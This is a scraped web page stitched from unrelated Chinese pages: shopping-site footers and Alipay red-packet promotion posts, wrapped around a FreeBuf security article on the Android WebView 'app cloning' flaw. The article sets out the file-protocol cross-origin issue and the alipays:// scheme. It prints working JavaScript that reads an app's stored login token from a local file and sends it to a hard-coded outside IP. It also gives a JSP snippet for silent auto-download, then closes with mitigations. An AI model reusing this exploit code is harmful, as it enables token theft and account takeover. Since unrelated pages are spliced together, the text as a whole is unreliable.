声明：本站信息来源于网络或会员投稿，不代表本站观点，如有侵犯到您的权益请发邮件到我们将在第一时间删除处理。
上一篇：下一篇：
相关热门文章
刚刚，支付宝官方再次发布重大利好，阿里决定在10亿红包的基础上再次追加10个亿，全面反馈老用户。这次支付宝发飙，主要在三个方面升级，一个是扫码赚钱红包金额将翻倍...
把一百万存进余额宝的话，一天的收入能有多少呢？很好奇吧！让小琴里来算一算吧。借用一张网友的截图，一百万存入支付宝一天收入够小琴里一个月的工资啦！...
最近有一位女子就遇到了天上掉馅饼的事情，真的是太幸运了，一觉醒来发现自己的账户凭空就多出了巨款，还以为在做白日梦呢，不敢相信!...
淘票票送现金红包啦！真金白银，每天可领多个，最高88元哦！那支付宝怎么领取淘票票红包？支付宝淘票票红包在哪领取呢？下面来具体看看吧。如何领取淘票票红包？打开支付...
淘票票1000万现金邀你瓜分！淘票票送现金红包啦！真金白银，每天可领多个！那支付宝淘票票送现金红包活动怎么参加_怎么领取淘票票红包呢？一起来看看吧。1、淘票票送...
支付宝很早就推出了信用卡还款的功能，并且还为信用卡还款设置还款提醒，提醒持卡人及时还款，以免逾期。那支付宝怎么设置信用卡还款提醒？支付宝在哪设置信用卡还款提醒呢...
支付宝早已经从一个单纯的支付工具变成了一整套的生活服务，那支付宝近期上线的新功能服务有哪些呢？下面来了解下支付宝最新功能吧。支付宝近期在公交方面发力，武汉有暑期...
支付宝世界杯公仔卡活动玩法很简单，还能参与球队竞赛，集齐所有公仔卡之后就能瓜分两亿现金大奖！那支付宝世界杯公仔卡怎么集齐？支付宝世界杯公仔卡在哪集齐呢？一起来看...
其它网购技巧信息
1234567891011
热门微商货源
1234567891011
淘宝网店怎么开，找免费开网店货源，欢迎来到53网店货源网。本站的货源信息由会员发布，请妥善交易！
-|--|--|--|--|--|--|--|-
投诉、建议联系邮箱:kf@53shop.Com (请尽量发邮件联系) QQ: 广告联系 QQ: 交流QQ群:(禁止任何广告)
& shop.com, all rights reserved.应用克隆，从支付宝自动领红包链接谈起 - FreeBuf互联网安全新媒体平台 | 关注黑客与极客
应用克隆，从支付宝自动领红包链接谈起
共846453人围观
，发现 23 个不明物体
*本文原创作者：rebeyond，本文属FreeBuf原创奖励计划，未经许可禁止转载
号，腾讯玄武实验室召开了一个新闻发布会，向公众公布并演示了“应用克隆”漏洞，并称：利用该漏洞，用户只需要点击一个链接，用户的支付宝、携程等APP的登陆状态，就可以被克隆到其他用户的手机上，一时造成用户恐慌。恰好这段时间支付宝的“天天领红包”活动进行的如火如荼，出现了通过点击一个链接就自动抢红包的薅羊毛方式。
下面结合支付宝的自动领红包链接，对“应用克隆”漏洞从技术原理上作一下分析。
支付宝自动领红包
在去年年底，支付宝推出了一个“天天领红包”活动，用户只需要将自己的红包口令通过短信或者微信的方式发给对方，对方复制该条信息然后打开支付宝APP，便会得到一个支付宝红包，这个红包可以直接用于支付宝消费，消费之后，推荐人会得到一笔赏金，直接到账。当然也可以直接让对方用支付宝扫描自己的推荐二维码，效果一样。这次活动持续时间长、活动力度大，羊毛很厚，因此大量用户为了赚取赏金，开始各显神通，比如下面这两个：
然后聪明的程序员做了一个链接，对方只要点击一下这个链接就会自动打开支付宝领一个红包，免去了扫描二维码、复制红包口令、手动打开支付宝APP这些繁琐的操作。笔者在元旦假期的时候，也尝试做了这么一个链接，起了一个诱人的标题发布到了微信朋友圈，刚发布一会几十块钱赏金就到账了，确实比发推广信息效率高很多：
其实通过网页唤起第三方APP不是什么新鲜的技术，做过安卓开发的应该都很熟悉。支付宝、导航系统、各种手机播放器等APP都大量的用到了这种技术，比如通过网页打开一个视频播放界面，这时旁边会有个按钮“在APP中播放”，点击后会直接打开对应的APP继续播放之前的视频。实现这个需求只需要在定义activity的时候，指定一个scheme（协议），并且设置一个name为android.intent.category.BROWSABLE的category即可。这种在浏览器中通过自定义协议打开第三方应用的方法我们可以称之为“伪协议”（正常在浏览器中打开的都是http、https、ftp这种常规协议），下图即为支付宝定义的伪协议：
接下来分析一下支付宝红包的推荐二维码，解析二维码得到URL:，访问该URL并抓包分析发现：
返回302跳转到了，
返回302跳转到了
分析最后这个URL发现其scheme参数即为拉起支付宝的关键，URL解码:
scheme=alipays://platformapi/startapp?saId=&clientVersion=3.7.0.0718&qrcode=https%3A%2F%2Fqr.alipay.com%2Fc1x05309e4ttz2v7xrwrzcd%3F_s%3Dweb-other
通过上面这个参数我们可以清晰的看到这是一个启动支付宝的伪协议，在启动的时候向支付宝传递了3个参数：saId、clientVersion、qrcode，其中qrcode即为我们的红包推荐二维码链接。所以猜测这个activity的功能就是打开我们通过qrcode指定的URL。接下来写一个简单的alipay.htm页面来测试：
window.location.href='alipays://platformapi/startapp?saId=&clientVersion=3.7.0.0718&qrcode=https%3A%2F%2Fqr.alipay.com%2Fc1x05309e4ttz2v7xrwrzcd%3F_s%3Dweb-other'
打开效果如下（大家可以将以下链接复制到手机浏览器测试）：&
浏览器成功唤起了支付宝APP，并跳到了领红包的界面。到此，支付宝自动抢红包的链接就分析完成了。
在上面支付宝自动抢红包的伪协议中，可以看到我们可以通过控制qrcode参数来控制支付宝打开我们指定的一个链接，这里qrcode是不是只能打开支付宝的页面呢？下面我们用百度测试一下，构造如下URL：
alipays://platformapi/startapp?saId=&clientVersion=3.7.0.0718&qrcode=https%3A%2F%2Fwww.baidu.com%2F
发现可以成功打开，效果如下：
像这种通过接收外部传入的URL参数，然后在APP内进行加载的特性，是导致下面所介绍的“应用克隆”漏洞的元凶。&
日，国家信息安全漏洞共享平台（CNVD）接收到腾讯玄武实验室报送的Android WebView存在跨域访问漏洞(CNVD-)。攻击者利用该漏洞，可远程获取用户隐私数据（包括手机应用数据、照片、文档等敏感信息），还可窃取用户登录凭证，在受害者毫无察觉的情况下实现对APP用户账户的完全控制。由于该组件广泛应用于Android平台，导致大量APP受影响，构成较为严重的攻击威胁。
CNVD将应用克隆漏洞(CNVD-)描述为“AndroidWebView存在跨域访问漏洞”，那么我们就先来看看什么是跨域。讨论跨域，自然要从浏览器的安全机制“同源策略”谈起，同源策略是由Netscape提出的一个著名的安全策略，其限制从一个源加载的文档或脚本与来自另一个源的资源进行交互。这是一个用于隔离潜在恶意文件的关键的安全机制。如果两个URL的协议、端口、域名是相同的，则认为这两个URL是同源的，互相访问资源不受限制，比如 中的脚本可以向发起ajax请求，并获取响应内容。但是如果中的脚本向发起请求就会被禁止，因为此时两者属于不同的源，而这个被禁止的请求就叫跨域请求。同源策略为很多正常的web业务场景带来了不便，因此出现了CORS和JSONP等合法的跨域机制。
File协议主要用于访问本地计算机中的文件，就如同在Windows资源治理器中打开文件一样，比如我想查看本地/etc/hosts文件的内容，我就可以直接在浏览器输入file:///etc/hosts来访问。当然我们也可以通过浏览器访问本地的html文件，文件中也可以内嵌JavaScript脚本，脚本里面可以继续访问File协议，这样可以读取webview所在进程具有读取权限的所有本地文件的内容。这样似乎也没什么问题，毕竟所有的数据操作都是发生在本地的。但是Android的webview有个API叫做
setAllowUniversalAccessFromFileURLs，当该API的设置值为True时，其实就是开启了File协议的跨域机制，File协议中的脚本可以跨域访问其他协议，比如http，这样就存在问题了：攻击者通过让webview加载一个本地恶意的htm文件，这个htm文件会读取本地的敏感文件内容，并把内容通过http请求发送至远程服务器。这也便是“应用克隆”漏洞发生的根源。
通过上面的描述可以总结得知，如果想要成功利用应用克隆漏洞，至少需要满足如下几个要求：
1. 攻击者可以外部调用被攻击APP，指令其加载一个本地的html文件。从前文得知通过向支付宝传递qrcode参数可以指令其访问指定的URL，不过经过实测，这个URL不能是File协议的，因此不能指定支付宝访问本地的html文件。
2. 被攻击APP的setAllowUniversalAccessFromFile URLs值为true。这个条件就比较苛刻了，在Android4.1（ 2012年发布）之前的版本，该选项默认为True，之后的版本默认值为False。所以除非 APP是很老的版本，或者是新版本有着很特殊的业务需求，否则的话是不会将setAllowUniversalAccessFrom FileURLs设置为True的。
3. 攻击者需要在被攻击的手机上下载一个html文件并保存在一个可被File协议访问到的位置。在Android老版本曾经出现过几个漏洞，可以让Android系统自带浏览器静默下载html文件到默认的下载目录下，过程不需要与用户交互。即使现在，chrome的最新版仍然可以通过访问一个链接直接静默下载html文件到默认下载目录下：
&%response.setHeader("Content-Disposition","filename=autodown.htm");out.print("&html&&script&alert('just forautodownload test!')&/script&&/html&");%&
将上面的代码保存为down.jsp，然后通过chrome for Android访问，可以自动下载autodown.htm文件至/storage/sdcard0/Download目录下。
同时满足以上三个条件，就可以达到“应用克隆”的效果了。
由于支付宝最新版不同时满足前面提到的三个条件，甚至支付宝在“应用克隆”漏洞发布会举行前的多个历史版本也不能同时满足“应用克隆”的条件。这里就以我自己编写的一个APP来作为案例演示。
该APP实现了以下功能：
1. 跟支付宝类似，该APP可以被浏览器通过伪协议唤起，且可以接受浏览器传递的url参数，并在APP内部调用webview组件加载该URL。
2. 提供本地登录功能，登录成功后，将token持久化在sharedpreferences中，下次打开APP会自动读取sharedpreferences中的token用于身份验证，不需要每次打开APP都要重新登录。
正常情况下，APP首次打开会要求用户输入用户名密码：
登陆成功之后，主页面会显示当然登陆的用户名及token信息：
下面构造一个准备下载到手机上的恶意htm文件，内容如下：
test by me!
var arm ="file:///data/data/com.example.q.myapplication/shared_prefs/config.xml";
& & if (window.XMLHttpRequest)
& & & & xmlhttp=new XMLHttpRequest();
& & xmlhttp.onreadystatechange=function()
& & & & //alert("statusis"+xmlhttp.status);
& & & & if (xmlhttp.readyState==4)
& & & & & & &window.data=xmlhttp.responseText
& & & & & & &alert(window.data);
& & & & & & & & & & &var url ="http://114.115.139.176/getdata.jsp?data="+window.
& & & & & & & & & & & & & & &var xmlhttp2;
& & & & & & & & & & & & & & &if(window.XMLHttpRequest)
& & & & & & & & & & & & & & &{
& & & & & & & & & & & & & & & & & & & &xmlhttp2=newXMLHttpRequest();
& & & & & & & & & & & & & & &}
& & & & & & & & & & & & & & &xmlhttp2.onreadystatechange=function()
& & & & & & & & & & & & & & &{
& & & & & & & & & & & & & & & & & & & &//alert("statusis"+xmlhttp.status);
& & & & & & & & & & & & & & & & & & & &if(xmlhttp2.readyState==4)
& & & & & & & & & & & & & & & & & & & &{
& & & & & & & & & & & & & & & & & & & & & & & & &alert(xmlhttp2.responseText);
& & & & & & & & & & & & & & & & & & & &}
& & & & & & & & & & & & & & &}
& & & & & & & & & & & & & & &xmlhttp2.open("GET",url);
& & & & & & & & & & & & & & &xmlhttp2.send(null);
& & xmlhttp.open("GET",arm);
& & xmlhttp.send(null);
然后在服务器测准备一个getdata.jsp文件用来接收被攻击手机发来的数据，接下来我准备了两台手机A和B，在A手机上登陆了用户，在B手机上登陆了用户，然后在用户的手机上打开一个恶意链接，之后B手机上登陆的用户由变成，通过对方点击一个链接，我们成功获取了对方的token，实现了“克隆”。
演示视频：&
1. 如果APP支持Android4.1（API level 16）之前的版本，请将setAllowFileAccessFromFileURLs 或setAllowUniversalAccessFromFileURLs显示设置为False。如前文所述，“应用克隆”应用克隆的漏洞本质是file协议中的js读取本地文件内容并跨域通过http、https、ftp等协议发送出去，所以通过setAllowUniversalAccessFromFileURLs为False阻断file协议跨域，通过设置setAllowFileAccessFromFileURLs阻止file协议中的js读取本地文件的内容。
2. 如果业务需要不能将上述两个选项设置为False，可以对webview加载的URL进行白名单限制。
其实这个漏洞并不是什么新漏洞，setAllowFileAccessFromFileURLs、setAllowUniversalAccessFromFileURLs这两个API早就是webview常规安全加固项的排查目标之一了。发布会中提到的“新攻击模型”，也只是file跨域的众多攻击向量中的一个。
*本文原创作者：rebeyond，本文属FreeBuf原创奖励计划，未经许可禁止转载
必须您当前尚未登录。
必须（保密）
这家伙太懒，还未填写个人描述！
关注我们 分享每日精选文章
可以给我们打个分吗？2018支付宝扫二维码领大额红包图片 每天最新支付宝红包口令-闽南网
2018支付宝扫二维码领大额红包图片 每天最新支付宝红包口令
　　支付宝扫码领红包活动中不少用户每天只扫到区区的几毛钱，很是可怜，那么支付宝扫码领红包怎么扫钱多呢？下面小编为您带来支付宝扫码领红包大额图片分享。
　　日起，在线下门店支付扫支付宝红包码，除了获得实体店通用红包之外，还有机会额外获得超市、便利店、售货机专享红包，每天都有！
　　支付宝专享红包领取方法
　　首先大家保存下面这张支付宝跨年红包活动的宣传海报到手机相册：
2018支付宝扫二维码领大额红包图片
　　然后打开支付宝的扫一扫，点击右上角的相册，选择保存的海报就可以直接领到红包了，而专享红包是有几率获得的哦，并不是百分之百可以领到，建议大家用上面最新的海报领哦，概率会大一些的！
　　如果不想通过海报领取，也可以用下面的口令哦，复制下面的口令，然后打开支付宝app，点击领取红包即可
　　2018年每天最新支付宝红包口令：
　　【快来领取支付宝跨年红包！1月1日起还有机会额外获得专享红包哦！复制此消息，打开最新版支付宝就能领取！SsRdxH69Nn】《《请复制左方这段话，然后打开支付宝APP就可以领取支付宝口令红包。
　　新的专享红包和原有的通用红包并不冲突，可以同时获取，也可以叠加使用，但注意专享红包仅限当天有效，到第二天就不能用了，而且仅限指定超市、便利店、售货机使用。
　　不过参与专享红包活动的实体店相当多，各种线下超市、便利店、售货机都在列。详细》》
原标题：支付宝扫码领红包大额图片分享 支付宝扫码领红包在哪扫码
责任编辑：曾少林
“夏夜与美食更配”在泉州人身上展现得淋漓尽致。趁着夜里的些许凉意，约上亲朋好友一
48小时点击排行榜有支付宝收款码的可以免费领取红包海报啦！|红包|支付宝|海报_新浪网
有支付宝收款码的可以免费领取红包海报啦！
有支付宝收款码的可以免费领取红包海报啦！
我们都知道，最近支付宝的红包活动可多的不得了，现在我们的朋友圈和其它的社交圈子还是被支付宝的红包活动围攻，这样的活动今年过后以后也就不可能再有的了，所以很多人也发出了自己的红包活动。像很多支付宝用户一样，很多人都在支付宝首页搜索“1758549”，来领取2.85元的红包，这是一件很愉快的一件事！也有很多商家有了收款码之后，还在支付宝官方领取红包海报，下面小编就来为大家讲解一下这个红包码的领取方式吧！需要有支付宝收款码才行，没有的可是要先申请下来的哦！具体步骤如下：1、我们先打开支付宝首页，然后搜索“商家服务”进入，最后点击中间的蚂蚁图标。2、在我们进入之后就可以看到“经营有道”这四个字，在这里进入后第一个是立即申请，然后我们只要输入地址坐等到货就好了。而且明天也刚好是2月26日，支付宝也开始发货，所以小编今天通知一下大家去领取一下，反正这个是不要钱，大家都来领一个吧！
特别声明：以上文章内容仅代表作者本人观点，不代表新浪看点观点或立场。如有关于作品内容、版权或其它问题请于作品发表后的30日内与新浪看点联系。}